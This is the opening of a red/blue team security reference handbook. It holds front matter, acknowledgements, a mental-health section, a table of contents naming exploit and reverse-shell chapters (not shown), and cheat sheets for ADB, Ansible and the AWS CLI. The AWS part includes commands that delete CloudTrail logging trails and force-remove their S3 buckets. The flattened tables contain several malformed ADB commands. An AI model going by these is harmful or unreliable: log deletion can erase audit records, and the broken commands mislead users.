OPERATOR HANDBOOK

[Link].L33T;)

RED TEAM + OSINT + BLUE TEAM

NETMUX

V1 [02APR2020]
Operator Handbook. Copyright © 2020 Netmux LLC
All rights reserved. Without limiting the rights under the
copyright reserved above, no part of this publication may be
reproduced, stored in, or introduced into a retrieval system, or
transmitted in any form or by any means (electronic, mechanical,
photocopying, recording, or otherwise) without prior written
permission.

ISBN-10: 9798605493952

Operator Handbook, Operator Handbook Logo, Netmux, and the Netmux

logo are registered trademarks of Netmux, LLC. Other product and
company names mentioned herein may be the trademarks of their
respective owners. Rather than use a trademark symbol with every
occurrence of a trademarked name, we are using the names only in an
editorial fashion and to the benefit of the trademark owner, with
no intention of infringement of the trademark.

The information in this book is distributed on an “As Is” basis,

without warranty. While every precaution has been taken in the
preparation of this work, neither the author nor Netmux LLC, shall
have any liability to any person or entity with respect to any loss
or damage caused or alleged to be caused directly or indirectly by
the information contained in it.

While every effort has been made to ensure the accuracy and
legitimacy of the references, referrals, and links (collectively
“Links”) presented in this book/ebook, Netmux is not responsible or
liable for broken Links or missing or fallacious information at the
Links. Any Links in this book to a specific product, process,
website, or service do not constitute or imply an endorsement by
Netmux of same, or its producer or provider. The views and opinions
contained at any Links do not necessarily express or reflect those
of Netmux.

2
 INFOSEC TWITTER ACKNOWLEDGEMENT
@ABJtech @Mandiant @bmenell @m33x
@ACKFlags @ManuscriptMaps @bmenrigh @m3g9tr0n
@AGoldmund @Mao_Ware @bostongolang @m8urnett
@ASTRON_NL @MariNomadie @brandonkovacs @macadminsconf
@ATI_UT @MicahZenko @brandybblevins @macinteractive
@Adam_Cyber @Microsoft @brave @macvfx
@AgariInc @MidAtlanticCCDC @breenmachine @malcomvetter
@AlecMuffett @MikeConvertino @briankrebs @malwrhunterteam
@AndreGironda @Mordor_Project @bromium @mandiant
@AndrewAskins @Morpheus______ @brutelogic @maradydd
@AngelList @MrDanPerez @brysonbort @marcusjcarey
@Anomali @MyABJ @bsdbandit @markarenaau
@Antid0tecom @NASA @bsideslv @mason_rathe
@AricToler @NOBBD @bugcrowd @matthew_d_green
@Arkbird_SOLG @NSAGov @builtbykrit @mattokeefe
@Arkc0n @NYU_CSE @byharryconnolly @maxplanckpress
@ArmyCyberInst @NathanPatin @byt3bl33d3r @mayraatx
@Ascii211 @NetSPI @c0ncealed @mdholcomb
@Atredis @NewAmCyber @c2_matrix @mediafishy
@BEERISAC @NewAmerica @cBekrar @mewo2
@BHinfoSecurity @Newsy @calibreobscura2 @mgoetzman
@BSidesAVL @NoVAHackers @cantcomputer @michaelccronin
@BSidesCHS @Nordic_Choice @carnal0wnage @mikeymikey
@BSidesCharm @NotMedic @caseyjohnellis @moonbas3
@BSidesGVL @caseyjohnston @motosolutions
@BSidesLV @NullMode_ @catcallsPHL @moxie
@BSidesSF @OPCDE @cedowens @mrogers315
@BSidesSac @OSINTCurious @cgbassa @mroytman
@BSides_NoVA @OSPASafeEscape @chain @msftsecurity
@BanyonLabs @OSSEM_Project @checkmydump @msuiche
@Baybe_Doll @OWASP @chkbal @mtones9
@Beaker @Obs_IL @chris_foulon @mubix
@Bellingcat @ObscurityLabs @chrissanders88 @myhackerhouse
@Ben0xA @OpenAI @christruncer @mysmartlogon
@BenDoBrown @Openwall @cktricky @mythicmaps
@BerkeleyLaw @OrinKerr @climagic @neksec
@Binary_Defense @P4wnP1 @cnoanalysis @nerd_nrw
@BlueDoorSector7 @PJVogt @coalfirelabs @netflix
@BlueTeamCon @PMStudioUK @coalfiresys @networkdefense
@BrentWistrom @PWTooStrong @cobalt_io @nickstadb
@BruteLogic @Paladin3161 @codegrazer @nijagaw
@BsidesCLT @PaloAltoNtwks @commandlinefu @nisos
@BsidesDC @PassiveTotal @corelight_inc @nnwakelam
@BsidesLV @PasswordStorage @curi0usJack @nola_con
@BsidesTLV_CTF @PeterWood_PDW @cyb3rops @nostarch
@Bugcrowd @PhishingAi @cyber__sloth @nova_labs
@BugcrowdSupport @PhreakerLife @cyberstatecraft
@Burp_Suite @PiRanhaLysis @cyberwar_15 @nsagov
@CADinc @Prevailion @d3ad0ne_ @nuartvision
@CIA @PrimeVideo @dadamitis @nudelsinpita
@CNMF_VirusAlert @ProductHunt @dafengcao @nytimes
@CONFidenceConf @PwdRsch @daleapearson @objective_see
@CTFtime @PyroTek3 @dangoodin001 @obsecurus
@CU_ICAR @QW5kcmV3 @datadog @offsectraining
@CalibreObscura @RPISEC @daveaitel @oktopuses
@Capsule8 @Rapid7 @davidstewartNY @olafhartong
@CarloAlcan @RealDonaldTrump @davywtf @oleavr
@Carlos_Perez @RecordedFuture @dc_bhv @packetninjas
@CaseyCammilleri @RedDrip7 @dcstickerswap @pagedout_zine
@CashApp @Remediant @deadpixelsec @paloaltontwks
@CaveatCW @RidT @defcon @passingthehash
@Chick3nman512 @RiskIQ @demonslay335 @patricknorton
@CindyOtis_ @Rmy @dex_eve @patrickwardle
@CipherEveryword @Rmy_Reserve @dguido @pedramamini
@CircleCityCon @RonJonArod @dhdenny @pentest_swissky
@ClaireTills @RoseSecOps @dianainitiative @perribus

3
@ComaeIo @RupprechtDeino @digininja @philofishal
@CptJesus @Rupprecht_A @digitalshadows @philsmd
@CrackMeIfYouCan @RuraPenthe0 @dinodaizovi @photon_research
@CrowdStrike @RuralTechFund @disclosedh1 @pickie_piggie
@SAINTCON @dissect0r @pietdaniel
@Cyb3rWard0g @SAINTCONPCrack @dkorunic @pinguino
@CyberScoopNews @SANSinstitute @donttrythis @pir34
@Cyberarms @SINON_REBORN @dotMudge @planetlabs
@CyberjutsuGirls @SNGengineer @polrbearproject
@CynoPrime @SWiefling @dropdeadfu @prevailion
@DARPA @SailorSnubs @dumpmon @proofpoint
@DCPoliceDept @Salesforce @duo_labs @pumpcon
@D__Gilbertson @SatNOGS @dwizzzleMSFT @pupsuntzu
@Dallas_Hackers @Sbreakintl @dyn___ @pwcrack
@DaniGoland @Sc00bzT @dynllandeilo @quiztime
@DanielMiessler @SecBSD @edskoudis @qwertyoruiopz
@DarkDotFail @efadrones @r_netsec
@DataTribe @SecureThisNow @elastic @rapid7
@Dave_Maynor @SecurityVoices @emailrepio @rchomic
@Defcon @SektionEins @endsurveillance @reaperhulk
@DefuseSec @SethHanford @enigma0x3 @redblobgames
@DeptofDefense @ShapeSecurity @expel_io @redcanaryco
@DharmaPlatform @ShielderSec @eyalsela @reddit
@DhiruKholia @ShiningPonies @fastly @redteamfieldman
@DragonSectorCTF @SiegeTech @felixaime @reed_college_
@Dragonkin37 @SigintOs @foxit @rejoiningthetao
@Dragosinc @SiliconHBO @frankrietta @repdet
@Draplin @SkelSec @fs0c131y @replyall
@Dropbox @Snubs @fun_cuddles @reporturi
@DrunkBinary @SpareTimeUSA @fuzziphy @rickhholland
@DukeU @SpecterOps @g0tmi1k @riettainc
@EarthLib @Spy_Stations @geeknik @rkervell
@Elastic @Square @genscape @rmondello
@ElcomSoft @StartupWatching @gentilkiwi @robot_wombat
@ElectricCoinCo @Status451Blog @githubsecurity @rodoassis
@EmpireHacking @SteveD3 @gm4tr1x @ropnop
@EricMichaud @Stickerum @golem445 @rotmg_news
@ErrataRob @StratSentinel @google @rrcyrus
@Evil_Mog @SummitRoute @grimmcyber @rrhoover
@F5 @SunTzuSec @gynvael @rsi
@F5Networks @SuperfluousSec @hack_secure @rw_access
@FactionC2 @SynackRedTeam @hackerfantastic @ryanaraine
@FalconForceTeam @TCMSecurity @hacks4pancakes @s0lst1c3
@FewAtoms @THE_HELK @s3inlc
@FireEye @TalosSecurity @hak5darren @sS55752750
@Fist0urs @TankerTrackers @halvarflake @sashahacks
@FlatleyAdam @TechDrawl @har1sec @scatsec
@FletcherSchool @TechRanch @harmj0y @scythe_io
@Forensication @Technologeeks @haroonmeer @secbern
@Forrester @TerahashCorp @hashcat @securedrop
@Fortinet @TessSchrodinger @haveibeenpwned @secureideasllc
@FortyNorthSec @Th3Zer0 @hexlax @securitybsides
@Fox_Pick @The4rchangel @heykitzy @securitysublime
@GblEmancipation @TheHackersNews @hshaban @selenawyatt21
@GeorgetownCSS @TheMacFixer @hsmVault @sfissa
@GlytchTech @ThreatConnect @httpseverywhere @sharpstef
@Goetzman @TihanyiNorbert @humuinc @shellphish
@GoogleDevExpert @Timele9527 @i0n1c @shodanhq
@Graphika_Inc @Timo_Steffens @iHeartMalware @slyd0g
@Graphika_NYC @TinkerSec @iTzJeison @snlyngaas
@GreyNoiseIO @TorryCrass @iamthecavalry @snubs
@GrumpyHackers @TrailofBits @ics_village @solardiz
@HP @TribeOfHackers @icsvillage @sonofshirt
@Hacker0x01 @TrimarcSecurity @igsonart @spazef0rze
@HackersHealth @TrustedSec @ihackbanme @specterops
@HackingDave @Twitter @illusivenw @splcenter
@HackingHumansCW @TychoTithonus @iminyourwifi @square
@Hackmiami @USA_Network @initialized @sraveau
@Hak4Kidz @USArmy @insitusec @stevebiddle
@Hak5 @Unallocated @instacyber @stfitzzz

4
@Harvard @Unit42_Intel @iqlusioninc @stricturegroup
@HashCraftsMen @UnixToolTip @issuemakerslab @stvemillertime
@HashSuite @VCBrags @its_a_feature_ @swagitda_
@Hashcat @VICE @jack_daniel @synack
@HashesOrg @VK_Intel @jaredcatkinson @sysdig
@HashiCorp @VXShare @jaredhaight @tacticalmaid
@Haus3c @VerodinInc @jaysonstreet @tamperinfo
@HenriKenhmann @Viking_Sec @jcanto @taosecurity
@Hexacorn @WashingtonPost @jckichen @taurusgroup_ch
@HoustonHackers @WeekendFund @jedisct1 @tcvieira
@HunterPlaybook @WillStrouseJr @jessysaurusrex @teamcymru
@HuntersForge @WomenCyberjutsu @jhencinski @techstars
@HuntressLabs @WylieNewmark @jimmychappell @teserakt_io
@Hushcon @Xanadrel @jjx @testedcom
@Hydraze @XssPayloads @jkamdjou @th3cyF0x
@ICS_Village @YCND_DC @jmgosney @th_koeln
@IanColdwater @Yuantest3 @jmp_AC @theKos
@IdoNaor1 @ZDNetfr @jmulvenon @theNinjaJobs
@InQuest @ZIMPERIUM @joernchen @theZDI
@InfoSecSherpa @ZecOps @joeynoname @thecybermentor
@Inguardians @Zerodium @john_users @thecyberwire
@InsanityBit @absoluteappsec @jonasl @thegrugq
@Intel471Inc @acedtect @jorgeorchilles @themiraclefound
@IntelCrab @achillean @josephpizzo @thephreck
@J0hnnyXm4s @ackmage @jpgoldberg @thor_scanner
@JAMFSoftware @adamcaudill @jpmosco @thorsheim
@JGamblin @adversariel @jsecurity101 @threatcare
@JSyversen @agariinc @jsoverson @threatstack
@JacquelinesLife @aivillage_dc @jw_sec @tifkin_
@JakeGodin @albinowax @kalgecin @tiraniddo
@James_inthe_box @alexhutton @karimhijazi @tiskimber
@Jhaddix @alexisohanian @kaspersky @tliston
@JohnDCook @aloria @katestarbird @trailofbits
@JohnHultquist @antisnatchor @kauffmanfellows @trbrtc
@Johneitel @armitagehacker @keenjoy95 @troyhunt
@Kaspersky @ashley_shen_920 @kellthenoise @tyler_robinson
@KeePassXC @asmartbear @kennwhite @unix_ninja
@KennaSecurity @atredis @kfalconspb @unix_root
@KismetWireless @atxawesome @kfosaaen @usnavy
@KitPloit @atxstartupweek @khr0x40sh @usscastro
@KryptoAndI @austininno @kirbstr @v33na
@LFC @autumnbreezed @kl_support @veorq
@LOFAR @bad_packets @kledoux @virusbay_io
@LaNMaSteR53 @bascule @knoxss_me @volatility
@LawyerLiz @bcrypt @koelncampus @vshamapant
@LeaKissner @beauwoods @komandsecurity @vxunderground
@Leasfer @bellingcat @krishnasrini @w34kp455
@LeftoftheDialPC @benimmo @kryptera @wammezz
@LibreSpace_Fnd @benjdyer @kudelskisec @wellsgr
@Lisa_O @benmmurphy @kyleehmke @whoismrrobot
@LiveOakVP @bigmacjpg @lady_nerd @winxp5421
@LiveoakVP @billpollock @lakiw @wmespeakers
@Lookout @binaryedgeio @lapcatsoftware @wriveros
@M0nit00r @bitcrack_cyber @letsencrypt @wslafoy
@Ma7ad0r @bittner @likeidreamof28 @xforcered
@MaMe82 @blackorbird @likethecoins @xoreaxeaxeax
@MacDevOpsYVR @blackroomsec @liveoakvp @ydklijnsma
@MacTechConf @blairgillam @lordsaibat @yourstacks
@MaliciaRogue @blkCodeCollctve @lorrietweet @b0mb$h3ll

[Link]
@NETMUX ON TWITTER
OPERATOR HANDBOOK UPDATES OR SEND SUGGESTIONS/CORRECTIONS

5
 HEALTH & WELLNESS
National Suicide Prevention Lifeline: 1-800-273-8255

MENTAL HEALTH HACKERS

[Link]
Twitter @HackersHealth

There’s no simple test that can let someone know if there is a

mental health condition, or if actions and thoughts might be
typical behaviors or the result of a physical illness.

Each condition has its own set of symptoms, but some common signs
of mental health conditions can include the following:
• Excessive worrying or fear
• Feeling excessively sad or low
• Confused thinking or problems concentrating and learning
• Extreme mood changes, including uncontrollable “highs” or
feelings of euphoria
• Prolonged or strong feelings of irritability or anger
• Avoiding friends and social activities
• Difficulties understanding or relating to other people
• Changes in sleeping habits or feeling tired and low energy
• Changes in eating habits such as increased hunger or lack of
appetite
• Changes in sex drive
• Difficulty perceiving reality (delusions/hallucinations)
• Inability to perceive changes in one’s own feelings, behavior, or
personality
• Abuse of substances like alcohol or drugs
• Multiple physical ailments without obvious causes
• Thoughts of suicide, or suicidal planning
• Inability to carry out daily activities or handle daily problems
and stress

Don’t be afraid to reach out if you or someone you know needs help.
Learning all you can about mental health is an important first
step. Reach out to your health insurance, primary care doctor, or
state/country mental health authority for more resources.
I highly recommend finding a Mental Health First Aid class near
you, regardless of whether you are personally struggling with an
issue. Chances are high that you are close to someone who is,
whether you realize it or not. Directly or indirectly, mental
health conditions affect all of us. In fact, one in four people
have some sort of mental health condition. We are not as alone as
we think, and we can make a huge contribution to society just by
staying alive.

6
Support systems are vital to recovery. The support helps minimize
damage posed by mental illness on an individual. It also can save a
loved one’s life. There are many steps you can take to help
yourself or others, including:
• Inform yourself as much as possible about the illness being
faced.
• Start dialogues, not debates, with family and friends.
• In cases of acute psychiatric distress (experiencing psychosis or
feeling suicidal, for instance), getting to the hospital is the
wisest choice.
• Instead of guessing what helps: Communicate about it, or ask.
• Seek out support groups.
• Reassure your friends or family members that you care about them.
• Offer to help them with everyday tasks if they are unable.
• Include them in your plans and continue to invite them without
being overbearing, even if they resist your invitations.
• Keep yourself well and pace yourself. Overextending yourself will
only cause further problems in the long run.
• Avoid falling into the role of “fixer” and “savior.” No matter
how much you love someone, it cannot save them.
• Offering objectivity, compassion, and acceptance is valuable
beyond measure.
• Know that even if your actions and love may seem to have little
impact, they are making a difference.
• Have realistic expectations. The recovery process is not a
straight line, nor is it one that happens quickly.

PEOPLE TO FOLLOW ON TWITTER FOR LOVE, VIBES, and FEELS DAILY

@bsdbandit
@carnal0wnage
@marcusjcarey
@blenster
@jaysonstreet

7
 INFOSEC TWITTER ACKNOWLEDGEMENT -------------------------------------------- 3
HEALTH & WELLNESS ---------------------------------------------------------------------- 6
A ------------------------------------------------------------------------------------ 12
ANDROID DEBUG BRIDGE (ADB)-------------------------------------------------------13
ANDROID_Resources ---------------------------------------------------------------------16
ANSIBLE --------------------------------------------------------------------------------------16
AWS CLI --------------------------------------------------------------------------------------20
AWS_Defend -------------------------------------------------------------------------------27
AWS_Exploit --------------------------------------------------------------------------------30
AWS_Hardening ---------------------------------------------------------------------------35
AWS_Terms ---------------------------------------------------------------------------------35
AWS_Tricks ---------------------------------------------------------------------------------37
AZURE CLI -----------------------------------------------------------------------------------39
AZURE_Defend-----------------------------------------------------------------------------44
AZURE_Exploit -----------------------------------------------------------------------------44
AZURE_Hardening ------------------------------------------------------------------------48
AZURE_Terms ------------------------------------------------------------------------------48
AZURE_Tricks -------------------------------------------------------------------------------48

B ------------------------------------------------------------------------------------ 49
BLOODHOUND -----------------------------------------------------------------------------49

C ------------------------------------------------------------------------------------ 52
COBALT STRIKE-----------------------------------------------------------------------------52
CYBER CHEF ---------------------------------------------------------------------------------57

D------------------------------------------------------------------------------------ 59
DATABASES ---------------------------------------------------------------------------------59
DEFAULT PASSWORDS -------------------------------------------------------------------60
DOCKER --------------------------------------------------------------------------------------61
DOCKER_Exploit ---------------------------------------------------------------------------63

F ------------------------------------------------------------------------------------ 65
FLAMINGO ----------------------------------------------------------------------------------65
FRIDA -----------------------------------------------------------------------------------------67

G------------------------------------------------------------------------------------ 70
GCP CLI ---------------------------------------------------------------------------------------70
GCP_Defend --------------------------------------------------------------------------------74
GCP_Exploit ---------------------------------------------------------------------------------76
GCP_Hardening ----------------------------------------------------------------------------76
GCP_Terms ---------------------------------------------------------------------------------77
GHIDRA --------------------------------------------------------------------------------------77
GIT --------------------------------------------------------------------------------------------80
GITHUB CLI ----------------------------------------------------------------------------------82

8
 GITHUB_Exploit --------------------------------------------------------------------------- 83
GREYNOISE --------------------------------------------------------------------------------- 84
H ------------------------------------------------------------------------------------ 90
HASHCAT ----------------------------------------------------------------------------------- 91

I ------------------------------------------------------------------------------------- 92
ICS / SCADA TOOLS ---------------------------------------------------------------------- 93
INTERNET EXCHANGE POINTS--------------------------------------------------------- 93
IMPACKET ---------------------------------------------------------------------------------- 93
iOS ------------------------------------------------------------------------------------------- 95
IPTABLES ------------------------------------------------------------------------------------ 97
IPv4 ------------------------------------------------------------------------------------------ 99
IPv6 ----------------------------------------------------------------------------------------- 100
J ----------------------------------------------------------------------------------- 104
JENKINS_Exploit ------------------------------------------------------------------------- 104
JOHN THE RIPPER ----------------------------------------------------------------------- 105
JQ-------------------------------------------------------------------------------------------- 106
K ---------------------------------------------------------------------------------- 108
KUBERNETES------------------------------------------------------------------------------ 108
KUBERNETES_Exploit ------------------------------------------------------------------- 108
KUBECTL ----------------------------------------------------------------------------------- 112
L ----------------------------------------------------------------------------------- 119
LINUX_Commands ---------------------------------------------------------------------- 119
LINUX_Defend --------------------------------------------------------------------------- 123
LINUX_Exploit ---------------------------------------------------------------------------- 127
LINUX_Hardening ----------------------------------------------------------------------- 133
LINUX_Ports ------------------------------------------------------------------------------ 134
LINUX_Structure ------------------------------------------------------------------------- 144
LINUX_Tricks ----------------------------------------------------------------------------- 148
LINUX_Versions -------------------------------------------------------------------------- 150
M --------------------------------------------------------------------------------- 155
MACOS_Commands -------------------------------------------------------------------- 155
MACOS_Defend ------------------------------------------------------------------------- 163
MACOS_Exploit -------------------------------------------------------------------------- 174
MACOS_Hardening --------------------------------------------------------------------- 182
MACOS_Ports ---------------------------------------------------------------------------- 182
MACOS_Structure ----------------------------------------------------------------------- 187
MACOS_Tricks---------------------------------------------------------------------------- 190
MACOS_Versions ------------------------------------------------------------------------ 193
MALWARE_Resources ----------------------------------------------------------------- 194
MDXFIND / MDXSPLIT ------------------------------------------------------------------ 196

9
 METASPLOIT ------------------------------------------------------------------------------ 199
MIMIKATZ --------------------------------------------------------------------------------- 202
MIMIKATZ_Defend---------------------------------------------------------------------- 207
MSFVENOM ------------------------------------------------------------------------------ 208

N ---------------------------------------------------------------------------------- 210
NETCAT ------------------------------------------------------------------------------------ 210
NETWORK DEVICE_Commands ------------------------------------------------------ 211
NFTABLES --------------------------------------------------------------------------------- 217
NMAP -------------------------------------------------------------------------------------- 223
O ---------------------------------------------------------------------------------- 224
OSINT_Techniques ---------------------------------------------------------------------- 225
OSINT_Tools ------------------------------------------------------------------------------ 229
OSINT_Resources ----------------------------------------------------------------------- 234
OSINT_SearchEngines ------------------------------------------------------------------ 235
OSINT_SocialMedia --------------------------------------------------------------------- 238
OSQUERY ---------------------------------------------------------------------------------- 241

P ----------------------------------------------------------------------------------- 243
PACKAGE MANAGERS ------------------------------------------------------------------ 243
PASSWORD CRACKING_Methodology --------------------------------------------- 245
PHYSICAL ENTRY_Keys ----------------------------------------------------------------- 250
PORTS_Top1000 ------------------------------------------------------------------------- 252
PORTS_ICS/SCADA ---------------------------------------------------------------------- 254
PORTS_Malware C2--------------------------------------------------------------------- 256
PUPPET ------------------------------------------------------------------------------------ 259
PYTHON------------------------------------------------------------------------------------ 261

R ----------------------------------------------------------------------------------- 263
REGEX -------------------------------------------------------------------------------------- 263
RESPONDER------------------------------------------------------------------------------- 267
REVERSE SHELLS ------------------------------------------------------------------------- 269

S ----------------------------------------------------------------------------------- 276
SHODAN ----------------------------------------------------------------------------------- 276
SNORT -------------------------------------------------------------------------------------- 278
SPLUNK ------------------------------------------------------------------------------------ 279
SQLMAP ----------------------------------------------------------------------------------- 286
SSH ------------------------------------------------------------------------------------------ 288
T ----------------------------------------------------------------------------------- 294
TCPDUMP --------------------------------------------------------------------------------- 294
THREAT INTELLIGENCE ----------------------------------------------------------------- 297
TIMEZONES ------------------------------------------------------------------------------- 297
TMUX--------------------------------------------------------------------------------------- 303

10
 TRAINING_Blue Team ------------------------------------------------------------------ 305
TRAINING_OSINT ------------------------------------------------------------------------ 305
TRAINING_Red Team ------------------------------------------------------------------- 306
TSHARK ------------------------------------------------------------------------------------ 306

U ---------------------------------------------------------------------------------- 310
USER AGENTS ---------------------------------------------------------------------------- 310
V ---------------------------------------------------------------------------------- 314
VIM ----------------------------------------------------------------------------------------- 314
VOLATILITY -------------------------------------------------------------------------------- 318
W --------------------------------------------------------------------------------- 320
WEB_Exploit ------------------------------------------------------------------------------ 320
WEBSERVER_Tricks --------------------------------------------------------------------- 327
WINDOWS_Commands ---------------------------------------------------------------- 331
WINDOWS_Defend --------------------------------------------------------------------- 336
WINDOWS_Exploit ---------------------------------------------------------------------- 353
WINDOWS_Hardening ----------------------------------------------------------------- 366
WINDOWS_Ports ------------------------------------------------------------------------ 367
WINDOWS_Registry -------------------------------------------------------------------- 372
WINDOWS_Structure ------------------------------------------------------------------ 415
WINDOWS_Tricks ----------------------------------------------------------------------- 417
WINDOWS_Versions ------------------------------------------------------------------- 418
WINDOWS DEFENDER ATP------------------------------------------------------------ 419
WIRELESS FREQUENCIES--------------------------------------------------------------- 425
WIRELESS_Tools ------------------------------------------------------------------------- 427
WIRESHARK ------------------------------------------------------------------------------- 428

Y ---------------------------------------------------------------------------------- 430
YARA ---------------------------------------------------------------------------------------- 430

11
 A
12
A A
ANDROID DEBUG BRIDGE (ADB)
RED TEAM REVERSE ENGINEERING MOBILE
Android Debug Bridge (adb) is a versatile command-line tool that
lets you communicate with a device. The adb command facilitates a
variety of device actions, such as installing and debugging apps,
and it provides access to a Unix shell that you can use to run a
variety of commands on a device.

ADB BASICS
lists connected
adb devices devices
restarts adbd with
adb root root permissions
starts the adb
adb start-server server
kills the adb
adb kill-server server
adb reboot reboots the device
list of devices by
adb devices -l product/model
starts the
adb shell background terminal
exits the
exit background terminal
adb help list all commands
redirect command to
adb -s <deviceName> <command> specific device
directs command to
only attached USB
adb -d <command> device
directs command to
only attached
adb -e <command> emulator
PACKAGE INSTALLATION
adb shell install <apk> install app
install app from
adb shell install <path> phone path
install app from
adb shell install -r <path> phone path
adb shell uninstall <name> remove the app
PATHS
/data/data/<package>/databases app databases
/data/data/<package>/shared_prefs/ shared preferences
apk installed by
/data/app user

13
 pre-installed APK
/system/app files
/mmt/asec encrypted apps
/mmt/emmc internal SD Card
external/Internal
/mmt/adcard SD Card
/mmt/adcard/external_sd external SD Card
list directory
adb shell ls contents
print size of each
adb shell ls -s file
list subdirectories
adb shell ls -R recursively
FILE OPERATIONS
copy file/dir to
adb push <local> <remote> device
copy file/dir from
adb pull <remote> <local> device
access the private
run-as <package> cat <file> package files
PHONE INFO
adb get-stat–µ print device state
get the serial
adb get-serialno number
adb shell dumpsys iphonesybinfo get the IMEI
list TCP
adb shell netstat connectivity
print current
adb shell pwd working directory
adb shell dumpsys battery battery status
adb shell pm list features list phone features
adb shell service list list all services
adb shell dumpsys activity
<package>/<activity> activity info
print process
adb shell ps status
displays the
current screen
adb shell wm size resolution
dumpsys window windows | grep -E print current app's
'mCurrentFocus|mFocusedApp' opened activity
PACKAGE INFO
adb shell list packages list package names
list package name +
adb shell list packages -r path to apks
list third party
adb shell list packages -3 package names

14
 list only system
adb shell list packages -s packages
list package names
adb shell list packages -u + uninstalled
list info on all
adb shell dumpsys package packages apps
list info on one
adb shell dump <name> package
path to the apk
adb shell path <package> file
CONFIGURE SETTINGS
change the level
adb shell dumpsys battery set level <n> from 0 to 100
change the level to
adb shell dumpsys battery set status<n> unknown
adb shell dumpsys battery reset reset the battery
change the status
of USB connection.
adb shell dumpsys battery set usb <n> ON or OFF
sets the resolution
adb shell wm size WxH to WxH
DEVICE RELATED CMDS
reboot device into
adb reboot-recovery recovery mode
reboot device into
adb reboot fastboot recovery mode
adb shell screencap -p
"/path/to/[Link]" capture screenshot
adb shell screenrecord record device
"/path/to/record.mp4" screen
backup settings and
adb backup -apk -all -f [Link] apps
adb backup -apk -shared -all -f [Link] backup settings
backup only non-
adb backup -apk -nosystem -all -f [Link] system apps
restore a previous
adb restore [Link] backup
adb shell am start|startservice|broadcast
<INTENT>[<COMPONENT>] -a <ACTION> e.g.
[Link] -c <CATEGORY> start activity
e.g. [Link] intent
adb shell am start -a
[Link] -d URL open URL
adb shell am start -t image/* -a
[Link] opens gallery
LOGS
adb logcat [options] [filter] [filter] view device log
adb bugreport print bug reports
PERMISSIONS

15
 list permission
adb shell permissions groups groups definitions
list permissions
adb shell list permissions -g -r details

A A
ANDROID_Resources
RED/BLUE TEAM ANALYSIS MOBILE

AVC UnDroid [Link]

Submit Android apps for quick online analysis with AVC UnDroid.

Virustotal - max 128MB [Link]

Submit suspicious Android files/apks to analysis.

AppCritique - [Link]
Upload your Android APKs and receive comprehensive free security
assessments.

AMAaaS - [Link]
Free Android Malware Analysis Service. A bare metal service
features static and dynamic analysis for Android applications. A
product of MalwarePot.

APKPure - EXTRACTED APK's

[Link]
Apks are nothing more than a zip file containing resources and
assembled java code. If you were to simply unzip an apk, you would
be left with files such as [Link] and [Link].

REFERENCE:
[Link]
[Link]
[Link]

A A
ANSIBLE
RED/BLUE TEAM MANAGEMENT DEVOPS
Ansible is an open-source IT automation engine which can help you
to automate most of your repetitive tasks in your work life.
Ansible can also improve the consistency, scalability, reliability
and easiness of your IT environment.

VARIABLES
host_vars directory for host variable files
group_vars directory for group variable files

16
facts collecting the host specific data
register registered variables
vars in playbook
vars_files in playbook
include_vars module
include_tasks: [Link] include a sub task file
TASK CONTROL & LOOPS
with_items then “item” inside action
with_nested for nested loops
with_file
with_fileglob
with_sequence
with_random_choice
when meet a condition
MODULES
copy copy file or content
get_url download file
file manage file/directories
yum manage package
service manage services
firewalld firewall service
lineinfile add a line to dest file
template to template file with variables
debug to debug and display
add_host add host to inventory while play
wait_for use for flow control
apt manage apt-packages
shell execute shell commands on targets
PLAYBOOKS
ansible-playbook <YAML> Run on all hosts defined
ansible-playbook <YAML> -f
10 Fork - Run 10 hosts parallel
ansible-playbook <YAML> --
verbose Verbose on successful tasks
ansible-playbook <YAML> -C Test run
ansible-playbook <YAML> -C
-D Dry run
ansible-playbook <YAML> -l
<host> Limit to run on single host
HANDLERS
notify to notify the handler
handlers define handler
TAGS
tags add tags to the tasks
--tags ‘<tag>’ during playbook execution
--skip-tags for skipping those tags
tagged run any tagged tasks
untagged any untagged items

17
all all items
HANDLING ERRORS
proceed or not if any error on
ignore_errors current task
force_handlers call handler even the play failed
mark the task as failed if a
failed_when condition met
changed_when set “ok” or “failed” for a task
logical grouping of tasks (can use
block with when)
rescue to run if block clause fails
always run even block success or
always fails
ROLES
Role Directories
defaults default value of role variables
static files referenced by role
files tasks
handlers role’s handlers
role info like Author, Licence,
meta Platform etc
tasks role’s task defenition
templates jinja2 templates
tests test inventory and [Link]
vars role’s variable values
pre_tasks tasks before role
post_tasks tasks after role
ANSIBLE GALAXY
ansible-galaxy search
‘install git’ --platform
el search for a role
ansible-galaxy info <role-
name> display role information
ansible-galaxy install
<role-name> -p <directory> install role from galaxy
ansible-galaxy list to list local roles
ansible-galaxy remove
<role-name> remove role
ansible-galaxy init --
offline <role-name> initiate a role directory
DELEGATION
run the task on localhost instead
delegate_to: localhost of inventory item
assign the gathered facts from the
tasks to the delegated host instead
delegate_facts of current host
PARALLELISM

18
 number of forks or parallel
forks machines
--forks when using ansible-playbook
serial control number parallel machines
wait 3600 seconds to complete the
async: 3600 task
check every 10 seconds if task
poll: 10 completed
module to wait and check if
wait_for specific condition met
module to check an async task
async_status status
ANSIBLE VAULT
ansible-vault create
newfile create a new vault file
view file which is already ansible
ansible-vault view newfile vaulted
ansible-vault edit newfile Edit file
ansible-vault view --
vault-password-
file .secret newfile provide vault password as file
ansible-vault decrypt
newfile remove encryption or vault
ansible-vault rekey
newfile change vault password
--ask-vault-pass or
--vault-password-file ask for vault password for ansible-
<secret-password-file> playbook
TROUBLESHOOTING
log_path where logs are saved
debug module for debugging
syntax checking for playbooks
--syntax-check before they run
--step run playbook step by step
run a playbook but start at
--start-at-task specific task
--check check mode
will show the expected changes if
you run the playbook, but will not
--diff do any changes (kind of dry run)
uri module for testing url
module for running script and
script return success code
module to check the status of
stat files/dir
assert check file exist

REFERENCE:
[Link]

19
A A
AWS CLI
RED/BLUE TEAM RECON/ADMIN CLOUD
The AWS Command Line Interface is a unified tool to manage your AWS
services.

aws [options] <command> <subcommand> [parameters]

Command displays help for available top-level commands:

aws help

Command displays the available EC2 (Amazon EC2) specific commands:

aws ec2 help

Command displays detailed help for EC2 DescribeInstances operation.

aws ec2 describe-instances help

Cloudtrail - Logging and Auditing

List all trails
aws cloudtrail describe-trails

List all S3 buckets

aws s3 ls

Create a new trail

aws cloudtrail create-subscription --name awslog --s3-new-bucket
awslog2020

List the names of all trails

aws cloudtrail describe-trails --output text | cut -f 8

Get the status of a trail

aws cloudtrail get-trail-status --name awslog

Delete a trail
aws cloudtrail delete-trail --name awslog

Delete the S3 bucket of a trail

aws s3 rb s3://awslog2020 --force

Add tags to a trail, up to 10 tags allowed

20
